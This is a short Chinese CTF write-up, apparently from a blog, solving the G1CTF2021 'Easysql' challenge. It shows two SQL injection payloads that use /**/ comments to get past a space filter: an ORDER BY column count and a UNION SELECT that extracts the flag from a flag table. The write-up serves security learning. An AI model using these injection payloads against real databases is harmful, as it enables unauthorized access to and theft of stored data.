本站vip特权 - 全站资源免费下载

限时特惠

G1CTF2021 | Easysql  分析

映入眼帘的是1621860284_60ab9fbc6d7d65a5de710.png!small

告诉了我们flag在  flag表里的flag字段

在框里输入数字回显

1621860665_60aba139a844128cfc8a3.png!small

说明用户输入的数据被当做sql代码执行了

说明这里存在sql注入

页面显示  hacker!

说明空格被过滤了

sql注入绕过**空格**的方法

注释符/**/,%a0

sql注入绕过技巧推荐: https://www.cnblogs.com/Vinson404/p/7253255.html

判断当前页面的字段数

1'/**/order/**/by/**/1,2,3,4.....

经测试字段数为3

然后联合查询注入得flag

-1'union/**/select/**/1,2,flag/**/from/**/flag#

1621939518_60acd53ee79bfe5706343.png!small

网络安全

伊朗黑客组织Agrius“假冒”勒索团伙,掩盖网络间谍的真实目的

2021-6-3 18:47:20

网络安全

浅谈IAM——零信任之身份安全

2021-6-4 15:17:45

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索